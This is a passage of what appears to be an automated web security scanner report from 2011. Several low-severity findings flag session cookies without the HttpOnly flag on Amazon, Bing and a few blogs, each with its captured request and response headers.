Request

GET /gp/product/0672333368?ie=UTF8&tag=varioussite07-20&linkCode=as2&camp=1789&creative=9325&creativeASIN=0672333368 HTTP/1.1
Host: www.amazon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:29:33 GMT
Server: Server
x-amz-id-1: 04VBMFPBJXZ8J962J8W2
p3p: policyref="http://www.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
x-amz-id-2: fH3WLv3Jzmox2K4JTSORqyP3dG78f8/Z57/rsvJ+e57X3LhuWxe1LUoVMzwVuNdD
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=ISO-8859-1
Set-cookie: session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: session-id=185-0119564-6236271; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: UserPref=Oel7bYwRWS1gKV5RSiNZiK5lZAAokMgjRBrE5HDUyc9ir04+EELG8B5ZvPf93p6q/Wug8LCjECLDGs1NV2Ss5CncqyEhzH4Xx7dc9WlLyukc31H5gDwd1M0N2+5dFhG9r9UQX7bBDo1UvRUWe9CKYp29GbQIzzh4/e34AfsAPvBx1HVvihnL6R0of1OO3HpDP4AGMQXekYYMU4xOPcaCZk0VUxYwQP/RumeAVnei2D4rad8Xugnf2lk0nqBj3rkP6vzCnoFEzmbe3GgDLzEstwODPn9gW6oauV3yNspeqzecQNyMXmsDy/UrRjAUYndEw91zCgoaiXhnp39HquunCVQJJv/M/EGP7xhqBuRl49vBAGLgp8yRAJwJEgmd86mQGKHoS1Ku4VfxXIMdaRhhkLOtFXZRjef7VWDgVqemNz4+2YF2kiCxAGs6W/ltnCEp33kcaW9Sa6E=; path=/; domain=.amazon.com; expires=Sat Feb 05 23:29:33 2011 GMT
Content-Length: 386121


<html>
<head>


<style type="text/css"><!--


BODY { font-
...[SNIP]...

17.35. http://www.amazon.com/gp/product/0981511821

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.amazon.com
Path:   /gp/product/0981511821

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /gp/product/0981511821?ie=UTF8&tag=silverlightnet-20&linkCode=as2&camp=1789&creative=9325&creativeASIN=0981511821 HTTP/1.1
Host: www.amazon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:30:48 GMT
Server: Server
x-amz-id-1: 04T12HTYNC9C14B5HM4X
p3p: policyref="http://www.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
x-amz-id-2: XeMb8ZphbyEceEV8uZ/rPWye3cxGU6y1x/oV8aO+RYhm6u/E/f5MILGVJEj9+KgY
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=ISO-8859-1
Set-cookie: session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: session-id=192-4783126-1171450; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: UserPref=w5NxRqtIaF3L4rahG0xqjBB3n3qFCUwofDp3zBWe5EhsjtbYur03xSjQJ9BybU0a50jcTNieFmXXtReKWFRC9VmjzXi0XOC/OFAKRnG7FxTSci1yzlHjHk93BdOFZd0lP2syU01bP9TPGDHRfsl3MIWGi6LFCm6KknGsRmeHY8fn9B/9V80kP771c+DIVHNbXgbdUStVjMbObwSMw0PsU1t5OEXrbvibQByiwa/enRat+18rO1z/R5x72/itj1Hgk/9qruaLuAMz0XARYys99VN3UXRqpAZ5ZdeRF0tpgFHr5oNT5iwGE41ntxzwpuWVgDuzqVnkzcVQMTPlrDEuvjne19cXXCziPz1UvkP6Lli9UrikpcpmBibUKKWw06dJpIda0iRpYtxcMRQ2Kw/KAsxg3VFJrlcfJyClK5xaGGuIOxZCz57xNTqoWJehRZwKjuk3GB7s/Rg=; path=/; domain=.amazon.com; expires=Sat Feb 05 23:30:49 2011 GMT
Content-Length: 312688


<html>
<head>


<style type="text/css"><!--


BODY { font-
...[SNIP]...

17.36. http://www.amazon.com/gp/product/184968006X

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.amazon.com
Path:   /gp/product/184968006X

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /gp/product/184968006X?ie=UTF8&tag=silverlightnet-20&linkCode=xm2&camp=1789&creativeASIN=184968006X HTTP/1.1
Host: www.amazon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:30:20 GMT
Server: Server
x-amz-id-1: 0XKECKNR6H60A6C1P2PC
p3p: policyref="http://www.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
x-amz-id-2: CcVgt8Ki3aGDcInLSZrXm3lZNlBFSwvoguF5oYlAkL7M50lOj+5ROXGiGrpYAFMx
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=ISO-8859-1
Set-cookie: session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: session-id=180-2237308-2659866; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: UserPref=eHjsire/T0R7tdwagP8TcPZKxHTTNNEzlEP0ADU6p9fDKp0HUddz5FB1vK4SWFnhMc+scZ3m3MMvdOoMBY3JMfDMgo9VyMfPoh4njOXzH+BQw3FF7fbIOVZ2IDZk0zQNft3m03t/gL+Tvy3Fp+s+IAXdK6TUGa3MgVEkoCKmlXgie4ZhutN7WZcgnsC2goxBTpcCUomgvJOn1FOsZJdpvaOeWwE7d4VopLfVs94lsjI1refuYz4Fh3eO4sF0scjQpxW30YkQtgxE21eMEFTpM3qzTPbz2A4In7Bgd+9yov6kS3a2jmHTnaE+PhrTEqnDDXpdHgngmPdiaQgXuM6nGSPUPALmbdC5KPrDo93c5AVJkz34KeYRlhnIYDw9LgulDl/Iq7uP7A0bF2cLU4kNTRvZoGaE4G4BI5Ct3/CXQEOqN+ABdMJN/2U0eTeT5lbUCjHlpbF1b4Y=; path=/; domain=.amazon.com; expires=Sat Feb 05 23:30:20 2011 GMT
Content-Length: 400270


<html>
<head>


<style type="text/css"><!--


BODY { font-
...[SNIP]...

17.37. http://www.amazon.com/gp/product/1935182374

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.amazon.com
Path:   /gp/product/1935182374

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /gp/product/1935182374?ie=UTF8&tag=varioussite07-20&linkCode=as2&camp=1789&creative=9325&creativeASIN=1935182374 HTTP/1.1
Host: www.amazon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:29:13 GMT
Server: Server
x-amz-id-1: 0HRJE1J9WQNXJFNGE4NT
p3p: policyref="http://www.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
x-amz-id-2: NW5s8gvokJzw5y8JSRfujzyLlaoU46emA4SVA7QeDoqwIRKJVd6WwTevRv3TMvWf
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=ISO-8859-1
Set-cookie: session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: session-id=187-0383633-5130955; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: UserPref=ZM4E0es5+/XEPKcb4MMxmuznZiNyR6gzmDyuvhd39TYBscZma+7OBrLUTIyOOP5L3sOxz0fHi+PVrR7mWXqIyqofYHjJvSwGljfj0cWis60uRBkc1sDMnpiFAFA2IIWQcy0VuQkFO/hek0tlyUsNbuYdCElWcPRfXi2EhNSRROn/5eBkOahc4qN0YXGEPSxJXkpZsFFUUSU+6NyU2vkiTcA6YKmyCajS7mMAIbCCQEcVDyHYe/GzA3wLflh2+74ShUEGuIQUYMUcM2sdqOFPBWrtSn3q/r5KXVvVo3NHlIV0vVwFkMcJVoUPOq2S74LF/6hYIm/NwCdL9vCXUOjzqk7tUlQ3znq9WVE1fo0DdyrZ3XKTD152l098UAWXhdfxPyegtMSG3+GMu2CSzmKtj4j6dgItiNp5cZZ5baIxudoffyAijgZcIzX2w8f4DVw+AMxSy/RUheA=; path=/; domain=.amazon.com; expires=Sat Feb 05 23:29:13 2011 GMT
Content-Length: 398788


<html>
<head>


<style type="text/css"><!--


BODY { font-
...[SNIP]...

17.38. http://www.bing.com/shopping/content/search

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.bing.com
Path:   /shopping/content/search

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /shopping/content/search HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=0
Content-Length: 21920
Content-Type: text/html; charset=utf-8
Content-Language: en-US
X-UA-Compatible: IE=7
Date: Sun, 30 Jan 2011 17:09:46 GMT
Connection: close
Set-Cookie: JSESSIONID=1A7DB7C3FD212CE528E8DB8E0E3E23F1; Path=/shopping
Set-Cookie: _SS=SID=F972E03C2EDF4FC68C89EA08C563AB35; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Tue, 29-Jan-2013 17:09:46 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c7643fc9f42644b73a510efc43bf9535c; expires=Tue, 29-Jan-2013 17:09:46 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1621029&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 17:09:46 GMT; domain=.bing.com; path=/


    <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">

   
   
...[SNIP]...

17.39. http://www.bing.com/travel/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.bing.com
Path:   /travel/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /travel/ HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=0
Content-Length: 80826
Content-Type: text/html; charset=utf-8
Content-Language: en-US
X-UA-Compatible: IE=7
Date: Sun, 30 Jan 2011 17:07:24 GMT
Connection: close
Set-Cookie: lbc=904; Domain=.bing.com; Path=/travel
Set-Cookie: ETID=BCID-23es9dprqmhf2yz5b70uaphsurhm_VID-8s1eg7na0h4jyz617ujc5pm7spr_UID-; Domain=.bing.com; Expires=Tue, 29-Jan-2013 17:07:24 GMT; Path=/travel
Set-Cookie: JSESSIONID=32FADE2FA84EF5FA97AB9602B43221A4; Domain=.bing.com; Path=/travel
Set-Cookie: _SS=SID=1ABB65B487EE44FBB0D3AEF855DF1C31; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Tue, 29-Jan-2013 17:07:23 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c995d1595d772411ea969529da0bbdb7f; expires=Tue, 29-Jan-2013 17:07:23 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1621027&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 17:07:24 GMT; domain=.bing.com; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html >
<head><meta content="text/html; charset=utf-8" http-equiv="content-
...[SNIP]...

17.40. http://www.bing.com/travel/content/search

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.bing.com
Path:   /travel/content/search

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /travel/content/search HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=0
Content-Length: 22087
Content-Type: text/html; charset=utf-8
Content-Language: en-US
X-UA-Compatible: IE=7
Date: Sun, 30 Jan 2011 17:07:54 GMT
Connection: close
Set-Cookie: JSESSIONID=37564E6E7F080774679ECF5997C16D07; Path=/travel
Set-Cookie: _SS=SID=C3CD398E1DFA4C4F975438AABABE6119; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Tue, 29-Jan-2013 17:07:54 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c668c910cbe204671b9924806983f4bab; expires=Tue, 29-Jan-2013 17:07:54 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1621027&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 17:07:54 GMT; domain=.bing.com; path=/


    <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">

   

...[SNIP]...

17.41. http://www.bing.com/travel/deals/cheap-flights-to-the-caribbean.do

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.bing.com
Path:   /travel/deals/cheap-flights-to-the-caribbean.do

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /travel/deals/cheap-flights-to-the-caribbean.do HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=0
Content-Length: 123865
Content-Type: text/html; charset=utf-8
Content-Language: en-US
X-UA-Compatible: IE=7
Date: Sun, 30 Jan 2011 17:08:45 GMT
Connection: close
Set-Cookie: lbc=3; Domain=.bing.com; Path=/travel
Set-Cookie: ETID=BCID-ztqi6svu5vffcyz679phcpo04evn_VID-z4lcugfibg3fcmyz48nd68tfhq64b_UID-; Domain=.bing.com; Expires=Tue, 29-Jan-2013 17:08:44 GMT; Path=/travel
Set-Cookie: JSESSIONID=91A2C96FEAD616EEDDD9ECC848595A2F; Domain=.bing.com; Path=/travel
Set-Cookie: _SS=SID=1068051DB7E84B2BACE10D21337CBEC9; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Tue, 29-Jan-2013 17:08:44 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c8ea85c8550be4c23baed6b6abf5423ed; expires=Tue, 29-Jan-2013 17:08:44 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1621028&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 17:08:44 GMT; domain=.bing.com; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html >
<head><meta content="text/html; charset=utf-8" http-equiv="content-
...[SNIP]...

17.42. http://www.bing.com/travel/deals/last-minute-flight-deals.do

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.bing.com
Path:   /travel/deals/last-minute-flight-deals.do

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /travel/deals/last-minute-flight-deals.do HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=0
Content-Length: 116356
Content-Type: text/html; charset=utf-8
Content-Language: en-US
X-UA-Compatible: IE=7
Date: Sun, 30 Jan 2011 17:09:02 GMT
Connection: close
Set-Cookie: lbc=818; Domain=.bing.com; Path=/travel
Set-Cookie: ETID=BCID-zqvs48etgfd15yz5mbf6s748nk29_VID-z6fe286i2v7d0jyz7ntuvlu23m497_UID-; Domain=.bing.com; Expires=Tue, 29-Jan-2013 17:09:02 GMT; Path=/travel
Set-Cookie: JSESSIONID=A48EA884FEF0FFF60977843516BE3B8B; Domain=.bing.com; Path=/travel
Set-Cookie: _SS=SID=E663063A7EEA44019D8EA6796AF3F79D; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Tue, 29-Jan-2013 17:09:02 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c8620ba7d672b4a22bb6826c6ea8bdf69; expires=Tue, 29-Jan-2013 17:09:02 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1621029&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 17:09:02 GMT; domain=.bing.com; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html >
<head><meta content="text/html; charset=utf-8" http-equiv="content-
...[SNIP]...

17.43. http://www.bing.com/travel/destinations/honolulu-hawaii-hotels-hostels-motels-1002751

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.bing.com
Path:   /travel/destinations/honolulu-hawaii-hotels-hostels-motels-1002751

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /travel/destinations/honolulu-hawaii-hotels-hostels-motels-1002751?&qpvt=hawaii+hotels&cid=msn_tab&form=trvcon HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: private, max-age=0
Content-Length: 0
Content-Language: en-US
Location: http://www.bing.com/travel/destinations/honolulu-hawaii-trips-1002751
Date: Sat, 29 Jan 2011 23:53:04 GMT
Connection: close
Set-Cookie: lbc=5; Domain=.bing.com; Path=/travel
Set-Cookie: ETID=BCID-z1frs5ci265ddmyz5ee43ld448c06_VID-n3drr7hochmdyz5qnmnshetag4o_UID-; Domain=.bing.com; Expires=Mon, 28-Jan-2013 23:53:03 GMT; Path=/travel
Set-Cookie: JSESSIONID=0915020A0415116467B0471DBB4BFCCC; Domain=.bing.com; Path=/travel
Set-Cookie: _HOP=I=1&TS=1296345183; domain=.bing.com; path=/
Set-Cookie: _SS=SID=1A1CA9064645474DA9C96504F5DBD78E; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1619993&D=1593447&AF=NOFORM; expires=Mon, 28-Jan-2013 23:53:03 GMT; domain=.bing.com; path=/


17.44. http://www.bing.com/travel/hotels

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.bing.com
Path:   /travel/hotels

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /travel/hotels HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=0
Content-Length: 33604
Content-Type: text/html; charset=utf-8
Content-Language: en-US
X-UA-Compatible: IE=7
Date: Sat, 29 Jan 2011 23:53:04 GMT
Connection: close
Set-Cookie: lbc=813; Domain=.bing.com; Path=/travel
Set-Cookie: ETID=BCID-z6d2ojptrcpcsnyz5s94j9eripmvh_VID-2qgb11njgihtayz4ep5daa0tahh5_UID-; Domain=.bing.com; Expires=Mon, 28-Jan-2013 23:53:04 GMT; Path=/travel
Set-Cookie: JSESSIONID=30926D6422C305F2841AF2C231837CCF; Domain=.bing.com; Path=/travel
Set-Cookie: _SS=SID=52ECE574E10C48CFB614C0DDE7323FE8; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Mon, 28-Jan-2013 23:53:03 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c8f06a5eed62441db9a221eb26be6486f; expires=Mon, 28-Jan-2013 23:53:03 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1619993&D=1593447&AF=NOFORM; expires=Mon, 28-Jan-2013 23:53:04 GMT; domain=.bing.com; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html >
<head><meta content="text/html; charset=utf-8" http-equiv="content-
...[SNIP]...

17.45. http://www.dailygrail.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.dailygrail.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.dailygrail.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Set-Cookie: SESS2c2d3112bb07aea5c6314767c88e0a7a=7o9nkha47fuqrullf1i58nh6t2; expires=Tue, 22-Feb-2011 06:38:51 GMT; path=/; domain=.dailygrail.com
Last-Modified: Sun, 30 Jan 2011 02:11:26 GMT
ETag: "bf0c65ff60c7c1de71eb6cacfe0d3728"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sun, 30 Jan 2011 03:05:32 GMT
Server: lighttpd
Content-Length: 63252

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" dir="ltr">
<head>
<meta http-eq
...[SNIP]...

17.46. http://www.davidpoll.com/2011/01/26/quickly-building-a-trial-mode-for-a-windows-phone-application/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.davidpoll.com
Path:   /2011/01/26/quickly-building-a-trial-mode-for-a-windows-phone-application/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /2011/01/26/quickly-building-a-trial-mode-for-a-windows-phone-application/ HTTP/1.1
Host: www.davidpoll.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:23:52 GMT
Server: Apache
X-Powered-By: PHP/5.2.16
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: http://www.davidpoll.com/xmlrpc.php
Link: <http://www.davidpoll.com/?p=403>; rel=shortlink
Set-Cookie: PHPSESSID=782daaca0cd252e2cad9d7049b165cec; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 56502

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >

<head profile="http://gmpg.org/xfn/11">
<meta http-equiv
...[SNIP]...

17.47. http://www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.redacted|redacted/wonderwall|v14.redacted/|preview.redacted/|www.redacted/preview.aspx|mtv.com/videos/|mtv.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.dooce.com
